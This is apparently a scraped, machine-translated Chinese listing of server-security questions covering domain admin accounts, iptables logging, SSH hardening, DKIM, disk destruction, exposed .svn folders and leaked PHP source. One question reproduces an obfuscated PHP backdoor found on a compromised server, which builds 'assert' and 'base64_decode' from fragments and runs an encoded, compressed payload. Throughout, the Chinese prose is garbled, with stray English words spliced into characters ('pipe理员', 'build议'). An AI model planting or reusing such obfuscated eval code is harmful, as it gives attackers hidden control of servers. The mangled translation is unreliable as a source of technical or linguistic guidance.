Articles of 安全

UAC在Active Directory环境中

在工作中,我们最近收到了build议为域pipe理员提供两个单独的帐户。 一个帐户将是一个没有pipe理员权限的标准用户帐户,一个帐户将是Domain Admins的成员。 虽然我可以理解为什么这个build议正在制定,但这似乎也是一个皇家的痛苦。 我知道UAC以一种非常透明的方式pipe理这种types的权限升级。 UAC或其他解决scheme是否能够提供这种级别的保护?

跟踪路由不能在公司networking上工作

阻碍公司networking客户端的跟踪路由function的原因是什么?

如何使用UFW设置PSAD的iptables日志规则?

对于PSAD的工作,我需要添加以下iptables规则并启用数据包日志logging: iptables -A INPUT -j LOG iptables -A FORWARD -j LOG ip6tables -A INPUT -j LOG ip6tables -A FORWARD -j LOG 我在我的系统上使用UFW。 那么,我怎样才能用UFW添加这些规则呢?

将wget权限设置为755,这样root以外的用户可以执行这个安全风险很大?

我最近在博客上读到,默认情况下,linux上的wget是750,所以只有root可以执行它。 我想让用户wget,并将其更改为755,但我周围的networking阅读,这是一个很大的安全风险..

build议在root帐户和端口Ubuntu的服务器

我刚刚推出了一个网站,只有2天才上网,只是查了auth.log,而且已经有多个来自亚洲IP的login尝试。 我已经将自己的用户帐户密码更改为更安全的密码,现在我对根帐户感到担忧,并开放​​了端口? 关于根帐户:将根帐户的名称更改为完全随机的,只有我知道的是不是一个好主意? 由于大多数尝试都是在root用户上进行的,拥有用户名已经赢得了一半的战斗? 这是一个好主意还是坏主意? 关于端口:我是否应该closuresFTP和SSH的端口,并且只有当我想自己连接到服务器时才打开端口,这是否正常完成? 还有什么办法可以将SSH连接限制为一个IP,并且一次只允许一个连接? 我不太清楚正确的做法是什么,将不胜感激任何build议,你可以给!

DKIM:我可以直接更改DKIM中使用的RSA密钥而无需更改DKIMselect器吗?

我可以只更改DKIM(DNS TXTlogging)中使用的RSA密钥,而不更改DKIMselect器,否则会导致任何问题? 如果不是,DKIMselect器的目的是什么? 顺便说一句: 20120113是我在20120113._domainkey.gmail.com谈论的select

是否将硬盘上的磁性涂层磨光到足以完全消除数据?

这受到最近问题的启发: 在硬盘上打孔是否足以使其数据无法恢复? 特别是,钻孔本身似乎可能不足以阻止严重的攻击者使用超复杂的方法。 其他人在评论中提出了各种高度危险的方法,例如应用铝热剂,酸和其他破坏性物质,尽pipe它们可能起作用,但也给用户带来了相当大的潜在物理风险,因此未经训练的用户可能因此容易地伤害自己,相当严重(铝热剂可以烧伤肢体,酸肉吃,更不用说,从这样的化学反应无疑将释放的烟雾可能包含不好的东西,因为我不知道什么都行进入制作驱动器盘片)和/或造成一些不必要的财产损失。 这就使得它们相当棘手,而且至less在某些情况下可能是一个负担。 因此,这使我想知道那些训练较less,手段较简单的人可能更容易接近的方法,例如家里的DIY人或类似的东西(虽然有些人可能有权力处理像铝热石之类的东西,总是和大多数人不打扰这些东西。为了安全地处理它,我想至less应该在你的腰带上有一个铝热焊接过程。) 这使我很难想象,通过简单地去除磁性氧化物logging层的方法,(以前我曾经想过)数据破坏的可能性。 毕竟,我相信磁盘基板 – 通常是铝和玻璃 – 是所谓的“顺磁”材料。 顺磁性材料是在施加磁场时仅获得任何磁化的材料。 如果磁场被移除,则根本没有剩磁。 零磁化= 零数据,甚至对于能够访问世界级设施的超强攻击者来说,实际上是不可能的。 这是一个合法的结论吗? 好像这就是需要做的一切,似乎可能有两种方法可以实现这一点。 一个是只用一个简单的powershell砂光机,砂光驱动器,直到在盘片颜色变化,表明你已经穿过氧化物,并下降到基板。 (不知道这是不是可以在玻璃盘上做,因为我不知道会不会导致它们碎裂,然后你就会得到一个装满玻璃的箱子,但是对于铝片,它们应该撑起来,呃?) 但另一个更有趣的方法是我经常想到的一个方法,那就是故意头部碰撞的可能性,这可以通过打开驱动器并用手完全接触内部来完成,从而将油脂和指纹覆盖整个磁盘或者甚至让它在正常房间的不洁空气中脱颖而出几个小时。 这不需要危险的工具。 我在很久以前看到了一些有趣的照片: http://www.datarecoverytools.co.uk/data-recovery-vocabulary/vocabulary-ae/click-of-death/ 在那里它展示了如何通过头部碰撞来清洁磁盘,以至于即使玻璃基板被暴露(向下滚动页面 – 你也不能错过),表明该部分上没有剩余的氧化层。 这显然是只有一个驱动器发生。 这种types的总损害是否可以在任何硬盘上可靠地实现,如果你滥用它,并且进一步完成以使整个盘片变得干净? (例如,如果你放下头部,那么你就可以让它随着时间的推移运行,以确保那些崩溃的头部在整个磁盘上被拖曳一段时间,例如连续数小时或数天)我不确定即使是最好的攻击者也可以从那些玻璃清澈的地方恢复任何东西,因为我上面提到的顺磁性问题,驱动器内部的污泥显然是高度熵化的,就安全而言这是一件好事。 但另一方面,在这种情况下,这种情况只能是一种侥幸,而这种情况可能是完全不可行的,或者至less是远远不可靠的。 这有什么推理的声音,还是100%的BS充满? 另外,我并不是主张任何这些方法,而是因为好奇而问他们。

安全的.svn文件夹

我想知道是否不安全,让任何人在Web服务器上访问.svn文件夹 例如。 :http: //yoursite.com/.svn/ 如果不是最好的办法来保证这些?

服务器上的神秘文件 – 破解或其他东西?

发现一个奇怪的文件,我们没有创build在我们的目录之一。 它被命名为“.moreinfoege.php.KJt”在目录中,我们也有一个名为moreinfo.php的文件 我们最近一直有服务器问题(WordPress黑客攻击,DDoS攻击),所以我们对其他渗透事件高度警惕。 这是一个黑客? 它有什么方法可以得到? 这是什么内容看起来像(冗长的乱码string缩写适合在这里): <?php $IRdphe='as';$lgOULt='e';$UXkpWY=$IRdphe.'s'.$lgOULt.'r'.'t';$kOUHAp='b'.$IRdphe.$lgOULt.(64).'_'.'d'.$lgOULt.'c'.'o'.'d'.$lgOULt;@$UXkpWY(@$kOUHAp('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiNWIzcGVsczNzaTc4TzNtZTNNUHlNcnNwZFNocXNHekhsRVVQa3B6NHRHeTVMYVhUT1pJUFEzR1EyT0xVSEN3NzNqblgvcjF2VlFFTElCYzEyRW4zMmZ2eklKRVlDb1ZDb1ZBb0ZBcWQ5bEpuUEc1TmxncTF0M3QvKzNIdjhPaTQrT3JYUnJ2MTl1Zk85NzNpdStYbFQxK1BXK054WjlDdmpTZjEwV1JwZWV2clRudXAxN3lQS204T1dQNm9jL2pYNGNIYlYyYy9vdnoyZHZGQi9XSDkvb1BUK3c4ZWJkNXJ0dGVhemMzNzdYWmpyZG5ZYkt6Zng0L2k4dGVmQ3JYRHZjUERsd2V2ajR0L3ZmaGYzYmQvTzJ0L2VOYi82ZS9EOFVIenhmOCtQVy84OEhxMGU3Zy8yWnYrV255M3ZiNzFHeHU5YzZ0YXdIdzQ2dlFuU2ZxNDJYbWZqQ2NmdTYzdDRuQXc3a3pRbTByOWREem9UaWV0clc2 […] lY1V281TlEvZUhIMDB6Tld4L0hmb1RTTjg1d0liV3VKVWJPazFCdGNOOGtyOE9iZzdSSGZFWkFyUjRZenFCYnlSTHJGVTUrdDMvNC8iKSkpOw==')); ?>

我怎样才能防止用户看到我的PHP源代码?

我最近尝试访问我的网站,我看到一些令人不安的东西 – 用户可以下载index.php文件,看看它的内容,PHP代码! Apache可以如何提供PHP源代码而不是运行PHP源代码呢? 是否因为我们正在更新我们的网站进行维护? 我用这个代码: ErrorDocument 503 "Our website is temporarily closed for maintenance. It should reopen by…" RewriteEngine On # TO ALLOW YOURSELF TO ACCESS THE SITE NORMALLY, SET THE NEXT LINE TO YOUR IP ADDRESS. RewriteCond %{REMOTE_ADDR} !^111\.222\.333\.444$ RewriteRule .* – [R=503,L] 现在显示此消息。 但是,如果我再次发生这种情况,我怎么能自动出现?